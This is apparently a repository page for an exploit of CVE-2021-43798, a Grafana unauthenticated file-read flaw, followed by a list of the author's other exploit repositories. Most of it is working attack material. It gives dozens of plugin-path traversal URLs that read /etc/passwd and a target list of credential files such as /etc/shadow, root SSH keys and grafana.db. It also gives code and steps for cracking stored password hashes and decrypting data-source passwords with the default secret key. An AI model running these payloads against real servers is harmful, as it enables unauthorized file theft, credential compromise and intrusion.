• Stars
    star
    329
  • Rank 128,030 (Top 3 %)
  • Language
    Go
  • Created almost 3 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Grafana Unauthorized arbitrary file reading vulnerability

CVE-2021-43798 Grafana Unauthorized arbitrary file reading vulnerability

8.3.1 (2021-12-07) Security: Fixes CVE-2021-43798 . For more information, see our blog

https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/

image image

Example: get db password

/var/lib/grafana/grafana.db

image

加盐密码明文验证 https://github.com/grafana/grafana/blob/985c61d7008211e0fbee7d095bf3424adf71b4ac/pkg/util/encoding.go image

package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"golang.org/x/crypto/pbkdf2"
)

// EncodePassword encodes a password using PBKDF2.
func EncodePassword(password string, salt string) string {
	newPasswd := pbkdf2.Key([]byte(password), []byte(salt), 10000, 50, sha256.New)
	return hex.EncodeToString(newPasswd)
}

func main() {
	fmt.Println(EncodePassword("admin", "F3FAxVm33R"))
}

image image

Config /etc/grafana/grafana.ini

bash-5.1$ ps -ef |grep grafana
    1 grafana   0:35 grafana-server --homepath=/usr/share/grafana --config=/etc/grafana/grafana.ini --packaging=docker cfg:default.log.mode=console cfg:default.paths.data=/var/lib/grafana cfg:default.paths.logs=/var/log/grafana cfg:default.paths.plugins=/var/lib/grafana/plugins cfg:default.paths.provisioning=/etc/grafana/provisioning

Ensure encryption of data source secrets

Data sources store passwords and basic auth passwords in secureJsonData encrypted (AES-256 in CFB mode) by default. Existing data source will keep working with unencrypted passwords. If you want to migrate to encrypted storage for your existing data sources you can do that by:

  • For data sources created through UI, you need to go to data source config, re-enter the password or basic auth password and save the data source.
  • For data sources created by provisioning, you need to update your config file and use secureJsonData.password or secureJsonData.basicAuthPassword field. See [provisioning docs]({{< relref "../administration/provisioning" >}}) for example of current configuration.

https://github.com/grafana/grafana/blob/main/pkg/util/encryption.go

image

decode password

例如: 从数据库/var/lib/grafana/grafana.db获得数据源密文 R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q== ,通过读取 /etc/grafana/grafana.ini 中的 secret_key (default: SW2YcwTIb9zpOOhoPsMm),进行解密

$ go run AESDecrypt.go
[*] grafanaIni_secretKey= SW2YcwTIb9zpOOhoPsMm
[*] DataSourcePassword= R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==
[*] plainText= jas502n

encode password

例如: 将明文密码jas502n通过key,加密成密文

[*] grafanaIni_secretKey= SW2YcwTIb9zpOOhoPsMm
[*] PlainText= jas502n
[*] EncodePassword= QWhMOFdNZkqW6bx9YM0dPHMjzInsvycQXgMmMfFqpA==

other attack

/conf/defaults.ini
/etc/grafana/grafana.ini
/etc/passwd
/etc/shadow
/home/grafana/.bash_history
/home/grafana/.ssh/id_rsa
/root/.bash_history
/root/.ssh/id_rsa
/usr/local/etc/grafana/grafana.ini
/var/lib/grafana/grafana.db
/proc/net/fib_trie
/proc/net/tcp
/proc/self/cmdline
Default plugins count: 40
Successful count: 48

Bypass grafana nginx Proxy error 400

https://twitter.com/chybeta/status/1468410745264041992

/public/plugins/alertGroups/../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd

0x0 Default plugins installed (40) list:

http://x.x.x.x:3000/api/plugins?embedded=0

alertlist
annolist
grafana-azure-monitor-datasource
barchart
bargauge
cloudwatch
dashlist
elasticsearch
gauge
geomap
gettingstarted
stackdriver
graph
graphite
heatmap
histogram
influxdb
jaeger
logs
loki
mssql
mysql
news
nodeGraph
opentsdb
piechart
pluginlist
postgres
prometheus
stat
state-timeline
status-history
table
table-old
tempo
testdata
text
timeseries
welcome
zipkin

image

0x01 /usr/share/grafana/public/app/plugins/datasource ( 21)

/usr/share/grafana/public/app/plugins/datasource

bash-5.1$ ls -l
drwxr-xr-x    3 root     root          4096 Oct  7 10:55 alertmanager
drwxr-xr-x    7 root     root          4096 Oct  7 10:55 cloud-monitoring
drwxr-xr-x    8 root     root          4096 Oct  7 10:55 cloudwatch
drwxr-xr-x    2 root     root          4096 Oct  7 10:55 dashboard
drwxr-xr-x    9 root     root          4096 Oct  7 10:55 elasticsearch
drwxr-xr-x    3 root     root          4096 Oct  7 10:55 grafana
drwxr-xr-x   19 root     root          4096 Oct  7 10:55 grafana-azure-monitor-datasource
drwxr-xr-x    9 root     root          4096 Oct  7 10:55 graphite
drwxr-xr-x    6 root     root          4096 Oct  7 10:55 influxdb
drwxr-xr-x    4 root     root          4096 Oct  7 10:55 jaeger
drwxr-xr-x    7 root     root          4096 Oct  7 10:55 loki
drwxr-xr-x    2 root     root          4096 Oct  7 10:55 mixed
drwxr-xr-x    5 root     root          4096 Oct  7 10:55 mssql
drwxr-xr-x    5 root     root          4096 Oct  7 10:55 mysql
drwxr-xr-x    6 root     root          4096 Oct  7 10:55 opentsdb
drwxr-xr-x    5 root     root          4096 Oct  7 10:55 postgres
drwxr-xr-x    7 root     root          4096 Oct  7 10:55 prometheus
drwxr-xr-x    4 root     root          4096 Oct  7 10:55 tempo
drwxr-xr-x    7 root     root          4096 Oct  7 10:55 testdata
drwxr-xr-x    4 root     root          4096 Oct  7 10:55 zipkin

Fuzz Successful! image-20211207165332908

/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd

0x02 /usr/share/grafana/public/app/plugins/ (29)

/usr/share/grafana/public/app/plugins/panel/

drwxr-xr-x    2 root     root        4.0K Oct  7 10:55 alertGroups
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 alertlist
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 annolist
drwxr-xr-x    4 root     root        4.0K Oct  7 10:55 barchart
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 bargauge
drwxr-xr-x    4 root     root        4.0K Oct  7 10:55 canvas
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 dashlist
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 debug
drwxr-xr-x    4 root     root        4.0K Oct  7 10:55 gauge
drwxr-xr-x    8 root     root        4.0K Oct  7 10:55 geomap
drwxr-xr-x    4 root     root        4.0K Oct  7 10:55 gettingstarted
drwxr-xr-x    5 root     root        4.0K Oct  7 10:55 graph
drwxr-xr-x    5 root     root        4.0K Oct  7 10:55 heatmap
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 histogram
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 live
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 logs
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 news
drwxr-xr-x    4 root     root        4.0K Oct  7 10:55 nodeGraph
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 piechart
drwxr-xr-x    4 root     root        4.0K Oct  7 10:55 pluginlist
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 stat
drwxr-xr-x    4 root     root        4.0K Oct  7 10:55 state-timeline
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 status-history
drwxr-xr-x    4 root     root        4.0K Oct  7 10:55 table
drwxr-xr-x    4 root     root        4.0K Oct  7 10:55 table-old
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 text
drwxr-xr-x    6 root     root        4.0K Oct  7 10:55 timeseries
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 welcome
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 xychart

image-20211207170001125

Fuzz Success

/public/plugins/alertGroups/../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd

More Repositories

1

0day-security-software-vulnerability-analysis-technology

0day安全_软件漏洞分析技术
C
547
star
2

IDA_Pro_7.2

IDA_Pro_7.2
Shell
487
star
3

oracleShell

oracle 数据库命令执行
439
star
4

Log4j2-CVE-2021-44228

Remote Code Injection In Log4j
434
star
5

CVE-2020-5902

CVE-2020-5902 BIG-IP
Java
376
star
6

St2-057

St2-057 Poc Example
Shell
314
star
7

CVE-2019-13272

Linux 4.10 < 5.1.17 PTRACE_TRACEME local root
C
301
star
8

CVE-2020-14882

CVE-2020–14882、CVE-2020–14883
277
star
9

CVE-2019-1388

CVE-2019-1388 UAC提权 (nt authority\system)
174
star
10

cve-2019-2618

Weblogic Upload Vuln(Need username password)-CVE-2019-2618
Python
170
star
11

OA-tongda-RCE

Office Anywhere网络智能办公系统
PHP
146
star
12

CVE-2019-3396

Confluence 未授权 RCE (CVE-2019-3396) 漏洞
Python
146
star
13

ncDecode

用友nc数据库密码解密
138
star
14

CVE-2018-17182

Linux 内核VMA-UAF 提权漏洞(CVE-2018-17182),0day
C
129
star
15

gitlab-SSRF-redis-RCE

GitLab 11.4.7 SSRF配合redis远程执行代码
Shell
120
star
16

2018-QWB-CTF

2018强网杯CTF___题目整理
Python
114
star
17

fuzz-wooyun-org

WooYun Fuzz 库
PHP
107
star
18

solr_rce

Apache Solr RCE via Velocity template
Python
104
star
19

OA-Seeyou

note
Java
104
star
20

CVE-2019-12409

Apache Solr RCE (ENABLE_REMOTE_JMX_OPTS="true")
Python
103
star
21

CVE-2019-11580

CVE-2019-11580 Atlassian Crowd and Crowd Data Center RCE
Python
101
star
22

CVE-2018-2628

Weblogic 反序列化漏洞(CVE-2018-2628)
Python
101
star
23

CVE-2019-12384

Jackson Rce For CVE-2019-12384
Ruby
98
star
24

SpringBoot_Actuator_RCE

SpringBoot_Actuator_RCE
96
star
25

CVE-2019-11043

php-fpm+Nginx RCE
Python
96
star
26

CVE-2019-11581

Atlassian JIRA Template injection vulnerability RCE
91
star
27

kibana-RCE

kibana < 6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas),CVE-2019-7609
90
star
28

CVE-2019-0193

Apache Solr DataImport Handler RCE
Python
89
star
29

CVE-2020-8193

Citrix ADC Vulns
Python
85
star
30

CVE-2019-19781

Citrix ADC Remote Code Execution
Python
83
star
31

CVE-2020-2551

Weblogic RCE with IIOP
82
star
32

e-cology

e-cology OA_Beanshell_RCE
Java
80
star
33

zentao-getshell

禅道8.2 - 9.2.1前台Getshell
Python
79
star
34

CVE-2019-7238

Nexus Repository Manager 3 Remote Code Execution without authentication < 3.15.0
Python
77
star
35

jackson-CVE-2020-8840

FasterXML/jackson-databind 远程代码执行漏洞
Java
76
star
36

Redis-RCE

remote code execute for redis4 and redis5
Python
73
star
37

FinalShellDecodePass

FinalShellDecodePass 加密解密
Java
73
star
38

SHIRO-721

RememberMe Padding Oracle Vulnerability RCE
71
star
39

xxl-job

xxl-job RESTful API RCE
70
star
40

CVE-2019-0232

Apache Tomcat Remote Code Execution on Windows - CGI-BIN
Python
69
star
41

CVE-2019-16278

Directory transversal to remote code execution
Shell
69
star
42

Ubuntu-0day

all 4.4 ubuntu aws instances are vulnerable
C
66
star
43

CVE-2018-3191

Weblogic-CVE-2018-3191远程代码命令执行漏洞
Python
63
star
44

fastjson-RCE

fastjson-1.2.47
62
star
45

CVE-2019-2888

WebLogic EJBTaglibDescriptor XXE漏洞(CVE-2019-2888)
Java
59
star
46

Shiro_Xray

CommonsBeanutils1,CommonsCollectionsK1
Python
58
star
47

CVE-2019-15107

CVE-2019-15107 Webmin RCE (unauthorized)
Python
57
star
48

St2-052

St2-052
56
star
49

cve-2018-1273

Spring Data Commons RCE 远程命令执行漏洞
Python
56
star
50

CVE-2019-11510-1

SSL VPN Rce
Python
54
star
51

GitlabVer

gitlab version index
Shell
52
star
52

SHIRO-550

Shiro RememberMe 1.2.4 反序列化 漏洞
Python
52
star
53

webuploader-0.1.15-Demo

webuploader-v-0.1.15未授权-任意文件上传
52
star
54

BurpSuite_Pro_v1.7.37

Java
51
star
55

CVE-2020-17008

CVE-2020-17008 splWOW64 Elevation of Privilege
51
star
56

DBconfigReader

泛微ecology OA系统接口存在数据库配置信息泄露漏洞
50
star
57

SqlMap_BurpSuite

SqlMap_BurpSuite
Java
44
star
58

msfconsole-termux

How To Install Metasploit-Table on the Android Termux
Shell
42
star
59

CVE-2019-2890

CVE-2019-2890 WebLogic 反序列化RCE漏洞
41
star
60

cs_yara

check cs yara rules
YARA
40
star
61

st2-048

st2-048
Python
40
star
62

database-spring-ENC

sprint encode (plan text) get enc password
Java
39
star
63

mssql-command-tool

mssql 终端连接工具|命令执行
Go
38
star
64

BurpSuite-Plugin

Plugin For BurpSuite (Pentester)
JavaScript
38
star
65

fastjson-1.2.60-rce

autoType enable
36
star
66

Burp_AES_Plugin

Burpsuite Plugin For AES Crack
Java
35
star
67

mimikat_ssp

Security Support Provider Interface
C++
35
star
68

ThinkCMF_getshell

ThinkCMF 框架上的任意内容包含漏洞
Python
35
star
69

CVE-2020-10199

CVE-2020-10199、CVE-2020-10204、CVE-2020-11444
35
star
70

ChromePluginCrx

离线安装Chrome插件-插件备份
33
star
71

JWT_Brute

JWT_Brute
32
star
72

CVE-2020-1947

Apache ShardingSphere UI YAML解析远程代码执行漏洞
32
star
73

CVE-2019-15642

Webmin Remote Code Execution (authenticated)
Python
32
star
74

fastjson-1.2.61-RCE

fastjson-1.2.61-RCE
Java
32
star
75

CVE-2019-8451

Jira未授权SSRF漏洞
Python
31
star
76

fastjson-1.2.58-rce

fastjson-1.2.58-rce with h2 database
Java
31
star
77

Fortify_Rule

Decode Fortify Rule Bin File Get XML File
Java
29
star
78

CVE-2020-26259

CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the executing process has sufficient rights.
Java
28
star
79

IDA7.0-Pro

some people share IDA7.0!
25
star
80

S2-045-EXP-POC-TOOLS

S2-045 漏洞 POC-TOOLS CVE-2017-5638
Python
25
star
81

OpenFire_Decrypt

OpenFire 管理后台账号密码解密
Java
24
star
82

njRAT-0.7

远控工具Njrat
24
star
83

CVE-2018-14847

MikroTik RouterOS Winbox未经身份验证的任意文件读/写漏洞
Python
24
star
84

CVE-2019-20197

Nagios XI远程命令执行漏洞 <v5.6.9
23
star
85

CVE-2019-16759

vBulletin 5.x 未授权远程代码执行漏洞
Python
22
star
86

st2-046-poc

st2-046-poc CVE-2017-5638
Shell
22
star
87

Jboss_JMXInvokerServlet_Deserialization_RCE

Jboss_JMXInvokerServlet_Deserialization_RCE
21
star
88

CVE-2019-10392

CVE-2019-10392 RCE Jackson with Git Client Plugin 2.8.2 (Authenticated)
21
star
89

CVE-2018-10933

libssh CVE-2018-10933
Python
20
star
90

010-Editor-Template

20
star
91

Java-Compressed-file-security

java web 压缩文件 安全 漏洞
Python
19
star
92

Vmware_vCenter

VMware vCenter(Unauthenticated)
18
star
93

PHPStudy-Backdoor

phpstudy dll backdoor for v2016 and v2018
PHP
18
star
94

CVE-2019-3394

Confluence(<install-directory>/confluence/WEB-INF/)文件读取漏洞
17
star
95

CTF-RSA-tool

CTF-RSA-tool
C
17
star
96

Security_Article

scrapy website Article and link ...
HTML
17
star
97

Hscan

Hscan-Win-Gui
Python
16
star
98

CVE-2018-2894

Weblogic,CVE-2018-2894
Python
16
star
99

BurpSuite-icns

制作BurpSuite icns 在Mac OS上
16
star
100

phpweb

phpweb 前台任意文件上传
16
star